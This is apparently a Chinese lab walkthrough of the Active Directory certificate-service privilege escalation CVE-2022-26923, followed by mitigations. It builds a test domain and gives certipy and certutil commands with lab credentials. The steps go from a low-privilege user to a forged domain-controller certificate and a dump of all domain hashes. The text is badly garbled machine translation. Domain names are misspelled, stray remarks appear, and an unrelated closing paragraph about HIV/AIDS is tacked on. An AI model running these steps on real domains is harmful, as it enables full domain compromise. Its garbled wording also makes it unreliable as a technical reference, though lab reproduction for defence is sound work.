最新靶场场景！Active Directory 域权限提升漏洞(CVE-2022-26923)

靶场网络构建

节点环境搭建

AD: windows server 2016

(选择活动目录域服务; 其他设置是足够的。) 我不知道我在说什么。

安装完成后, 升级为域控制器, 并开始配置域控件 。

添加新的森林牧场网.cn、其他默认和安装说明。

AD CS

ADCS服务安装将在下面正式开始,只注意下列截图的内容,所有截图都是默认的。

服务器管理器-->添加角色和功能向导-->勾选服务器角色-->Active Director 证书服务

开始安装

设置 ADCS 服务, 仅使用以下快照的内容, 其余为默认 。

新建低权限AD用户

Zhangfei, 创建一个低权限 AD 用户: ZFpassword@ 123. com

靶场威胁复现

配置 DNS

在kali/etc/主机文件添加以下条目:

域内定位CA机器

在域内机器上执行。

certutil -config - -ping

测试证书生成

然后,使用用户证书模板(用户名=zhanfeiPassword_Fpassword@123)为低接入AD用户提供证书:

certipy req 'rangenet.cn/zhangfei:ZFpassword@123@dc.rangenet.cn' -ca RANGENET-DC-CA -template User

验证此证书是否有效

certipy auth -pfx zhangfei.pfx

创建机器账户到域

使用 BrodyAD 工具创建机器账户。

见MS-DS-MachineAccount配额的属性。

如果ms-DS-MachineAccountQuota>0就可以创建机器帐户

创建 LDAP 机器账户 。

更改机器账户的 DNS 主机Name

将 DNS 主机名从机器账户移动到域控DC。 我不确定您在写什么, RAREnet. cn 。

查看可用属性。 是否或是否正确更改 DNS 主机Name

伪造恶意证书

运行 Certipy 以生成机器证书, 您会注意到 DNS 主机名已改为 dc 。 我不确定您在说什么, Larenet. cn :

certipy req 'rangenet.cn/zhangfeiPC$:ZFpassword@123@dc.rangenet.cn'-ca RANGENET-DC-CA -template Machine

再次验证证书。 成功获取的散列 :

转储所有用户哈希

Py被利用来甩掉Hashi

防御方案

抱歉,微软,这篇文章是我们特别报导全球之声的部分内容。 com/ update-guide/verable/CVE-2022-26923。

2. 为改善用户指纹,通过将用户对象Sid嵌入新的 szOID_NTDS_CA_Security_EXT AID,将新的对象ID(OID)纳入新的证书。

3 权限“ 向 DNS 主机名加密写入” 现在只允许您更改 DNSHostname, 将其作为一个匹配 SAM 账户名或计算机账户的属性, 这样它不能用来折叠另一个主机的账户名 。

四. 确保您的证书模板受到限制。 机器和用户的自动注册只有在必要时才得到授权。 否则, 模板的范围可能会因安全选项而缩小 。

不存在允许用户向主机注册AD的商业情况。对于不应登记为新主机的账户,请将MS-DS-Machine-Accent-配额属性设定为 0。然而，这并不能解决问题，因为攻击者只是需要进入 域域的特定宿主。您现在可以执行证书申请。

多年来,日本政府一直在努力防治艾滋病毒/艾滋病和艾滋病毒/艾滋病。它就安全、反攻击解决办法、实地到抽样模拟和技术战设计和产出进行研究。该小组的主要成员是安保专家,在安全领域拥有十多年的专门知识。小组成员正在积极处理红蓝色对抗、渗透测试、反向分解、病毒分析、工业控制安全和无杀戮问题。